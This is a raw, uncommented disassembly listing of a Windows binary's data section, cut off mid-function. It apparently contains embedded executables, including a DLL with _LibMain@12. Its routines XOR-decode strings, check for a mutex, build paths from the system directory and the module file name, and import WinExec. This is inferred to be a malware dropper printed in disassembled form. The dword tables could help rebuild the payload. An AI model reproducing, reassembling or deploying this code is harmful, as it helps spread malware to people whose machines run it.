dword_43C1B8 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '¼',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43C5D8 proc near ; CODE XREF: .data:0043C700�p
; .data:0043C72E�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43C5F5: ; CODE XREF: sub_43C5D8+44�j
; sub_43C5D8+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43C624
cmp esi, [esp+1Ch+arg_4]
jz short loc_43C624
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43C5F5
call dword ptr [ebx+esi*4+8]
jmp short loc_43C5F5
; ---------------------------------------------------------------------------
loc_43C624: ; CODE XREF: sub_43C5D8+2A�j
; sub_43C5D8+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43C5D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C632 proc near ; CODE XREF: .data:0043C6F3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43CCCC
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43C632 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43C727
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43C685: ; CODE XREF: .data:0043C71E�j
cmp esi, 0FFFFFFFFh
jz loc_43C736
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43C715
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43C715
js short loc_43C723
mov edi, [ebx+8]
push ebx
call sub_43C632
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43C5D8
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43C715: ; CODE XREF: .data:0043C696�j
; .data:0043C6EB�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43C685
; ---------------------------------------------------------------------------
loc_43C723: ; CODE XREF: .data:0043C6ED�j
xor eax, eax
jmp short loc_43C740
; ---------------------------------------------------------------------------
loc_43C727: ; CODE XREF: .data:0043C66A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43C5D8
add esp, 0Ch
loc_43C736: ; CODE XREF: .data:0043C688�j
push 0Bh
call sub_43CD38
add esp, 4
loc_43C740: ; CODE XREF: .data:0043C725�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43C759
call sub_43C77C
loc_43C759: ; CODE XREF: .data:0043C752�j
call sub_43CC2B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C77C proc near ; CODE XREF: .data:0043C754�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43CCF0
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43CCF0
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43CCF0
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43CCE4
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43CCE4
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43CCE4
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43C7F5
push 0
push edi
call sub_43CD44
add esp, 8
loc_43C7F5: ; CODE XREF: sub_43C77C+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43C80F
push 0
push edi
call sub_43CD44
add esp, 8
call sub_43C814
loc_43C80F: ; CODE XREF: sub_43C77C+81�j
pop edi
leave
retn
sub_43C77C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C814 proc near ; CODE XREF: sub_43C77C+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43CC60
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43C851
; ---------------------------------------------------------------------------
loc_43C830: ; CODE XREF: sub_43C814+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C83D
inc [ebp+var_C]
loc_43C83D: ; CODE XREF: sub_43C814+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43C851: ; CODE XREF: sub_43C814+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C830
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43CD14
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43C884
xor eax, eax
jmp short loc_43C8FA
; ---------------------------------------------------------------------------
loc_43C884: ; CODE XREF: sub_43C814+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43C8DD
; ---------------------------------------------------------------------------
loc_43C889: ; CODE XREF: sub_43C814+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C8D7
push [ebp+var_4]
call sub_43CD14
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43C8C0
jmp short loc_43C8FA
; ---------------------------------------------------------------------------
loc_43C8C0: ; CODE XREF: sub_43C814+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43CD68
add esp, 8
add [ebp+var_8], 4
loc_43C8D7: ; CODE XREF: sub_43C814+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43C8DD: ; CODE XREF: sub_43C814+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C889
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43C8FA: ; CODE XREF: sub_43C814+6E�j
; sub_43C814+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C814 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C900 proc near ; CODE XREF: sub_43C9AA+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43CD20
add esp, 0Ch
xor edi, edi
jmp short loc_43C949
; ---------------------------------------------------------------------------
loc_43C92F: ; CODE XREF: sub_43C900+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43C949: ; CODE XREF: sub_43C900+2D�j
cmp edi, esi
jl short loc_43C92F
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43C999
and dword ptr ds:10004098h, 0
loc_43C999: ; CODE XREF: sub_43C900+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43C900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C9AA proc near ; CODE XREF: .data:0043CB43�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43CC9C
push 5
push 100040BDh
call sub_43C900
add esp, 8
push eax
push 0
push 1F0001h
call sub_43CCC0
mov [ebp+var_4], eax
or eax, eax
jz short loc_43CA05
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43CC78
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43CA05: ; CODE XREF: sub_43C9AA+3C�j
pop edi
pop esi
leave
retn
sub_43C9AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CA09 proc near ; CODE XREF: .data:0043CB77�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43CC54
call sub_43CC84
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43CA27: ; CODE XREF: sub_43CA09+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43CA27
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43CA5C
; ---------------------------------------------------------------------------
loc_43CA3E: ; CODE XREF: sub_43CA09+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43CA58
call sub_43CC48
inc [ebp+var_2]
call sub_43CC9C
jmp short loc_43CA64
; ---------------------------------------------------------------------------
loc_43CA58: ; CODE XREF: sub_43CA09+3D�j
dec [ebp+var_2]
loc_43CA5C: ; CODE XREF: sub_43CA09+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43CA3E
loc_43CA64: ; CODE XREF: sub_43CA09+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43CAA2
mov [ebp+var_4], 0
jmp short loc_43CA90
; ---------------------------------------------------------------------------
loc_43CA76: ; CODE XREF: sub_43CA09+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43CA90: ; CODE XREF: sub_43CA09+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43CA76
loc_43CAA2: ; CODE XREF: sub_43CA09+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43CCB4
call sub_43CCA8
pop edi
pop esi
pop ebx
leave
retn
sub_43CA09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CAC3 proc near ; CODE XREF: .data:0043CBCA�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43CC54
push 100040BBh
push [ebp+arg_0]
call sub_43CD5C
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43CAC3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43CD50
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43C9AA
add esp, 10h
or eax, eax
jz short loc_43CB57
xor eax, eax
inc eax
jmp loc_43CC00
; ---------------------------------------------------------------------------
loc_43CB57: ; CODE XREF: .data:0043CB4D�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43CC6C
call sub_43CC54
lea eax, [ebp-205h]
push eax
call sub_43CA09
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43CC90
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43CC54
call sub_43CC48
lea eax, [ebp-0FFh]
push eax
call sub_43CAC3
call sub_43CC9C
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43CD5C
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43CCD8
call sub_43CC84
xor eax, eax
inc eax
loc_43CC00: ; CODE XREF: .data:0043CB52�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CC2B
loc_43CC1A: ; CODE XREF: sub_43CC2B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43CC2B
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43CC2B proc near ; CODE XREF: .data:loc_43C759�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CC1A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43CC1A
sub_43CC2B endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC48 proc near ; CODE XREF: sub_43CA09+3F�p
; .data:0043CBBE�p
jmp dword ptr ds:100050ECh
sub_43CC48 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC54 proc near ; CODE XREF: sub_43CA09+F�p
; sub_43CAC3+7�p ...
jmp dword ptr ds:100050F0h
sub_43CC54 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC60 proc near ; CODE XREF: sub_43C814+10�p
jmp dword ptr ds:100050F4h
sub_43CC60 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC6C proc near ; CODE XREF: .data:0043CB66�p
jmp dword ptr ds:100050F8h
sub_43CC6C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC78 proc near ; CODE XREF: sub_43C9AA+49�p
jmp dword ptr ds:100050FCh
sub_43CC78 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC84 proc near ; CODE XREF: sub_43CA09+14�p
; .data:0043CBF8�p
jmp dword ptr ds:10005100h
sub_43CC84 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC90 proc near ; CODE XREF: .data:0043CBA9�p
jmp dword ptr ds:10005104h
sub_43CC90 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC9C proc near ; CODE XREF: sub_43C9AA+16�p
; sub_43CA09+48�p ...
jmp dword ptr ds:10005108h
sub_43CC9C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCA8 proc near ; CODE XREF: sub_43CA09+B0�p
jmp dword ptr ds:1000510Ch
sub_43CCA8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCB4 proc near ; CODE XREF: sub_43CA09+AB�p
jmp dword ptr ds:10005110h
sub_43CCB4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCC0 proc near ; CODE XREF: sub_43C9AA+32�p
jmp dword ptr ds:10005114h
sub_43CCC0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCCC proc near ; CODE XREF: sub_43C632+13�p
jmp dword ptr ds:10005118h
sub_43CCCC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCD8 proc near ; CODE XREF: .data:0043CBF3�p
jmp dword ptr ds:1000511Ch
sub_43CCD8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCE4 proc near ; CODE XREF: sub_43C77C+33�p
; sub_43C77C+45�p ...
jmp dword ptr ds:10005128h
sub_43CCE4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCF0 proc near ; CODE XREF: sub_43C77C+B�p
; sub_43C77C+17�p ...
jmp dword ptr ds:1000512Ch
sub_43CCF0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD14 proc near ; CODE XREF: sub_43C814+58�p
; sub_43C814+96�p
jmp dword ptr ds:10005138h
sub_43CD14 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD20 proc near ; CODE XREF: sub_43C900+23�p
jmp dword ptr ds:1000513Ch
sub_43CD20 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD38 proc near ; CODE XREF: .data:0043C738�p
jmp dword ptr ds:10005144h
sub_43CD38 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD44 proc near ; CODE XREF: sub_43C77C+71�p
; sub_43C77C+86�p
jmp dword ptr ds:10005148h
sub_43CD44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD50 proc near ; CODE XREF: .data:0043CB11�p
jmp dword ptr ds:1000514Ch
sub_43CD50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD5C proc near ; CODE XREF: sub_43CAC3+14�p
; .data:0043CBE2�p
jmp dword ptr ds:10005150h
sub_43CD5C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD68 proc near ; CODE XREF: sub_43C814+B7�p
jmp dword ptr ds:10005154h
sub_43CD68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aJfjbnm32 db 'Jfjbnm32',0 ; DATA XREF: sub_403D6F+29D�o
aJklmno db 'jklmno',0
aAy db 'Ay&',0
db '\',0
aTtii db '’’ˆë»',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 10h
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB_0 db 0Ah
db 'µ|B',0
align 4
aP_0 db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43DBB9 db 4Dh, 5Ah, 90h ; DATA XREF: sub_403BAD+EE�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43DFD9 proc near ; CODE XREF: .data:0043E111�p
; .data:0043E13F�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43DFF6: ; CODE XREF: sub_43DFD9+44�j
; sub_43DFD9+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43E025
cmp esi, [esp+1Ch+arg_4]
jz short loc_43E025
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43DFF6
call dword ptr [ebx+esi*4+8]
jmp short loc_43DFF6
; ---------------------------------------------------------------------------
loc_43E025: ; CODE XREF: sub_43DFD9+2A�j
; sub_43DFD9+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43DFD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E033 proc near ; CODE XREF: .data:0043E104�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_43F771
pop ebp
pop edi
pop esi
pop ebx
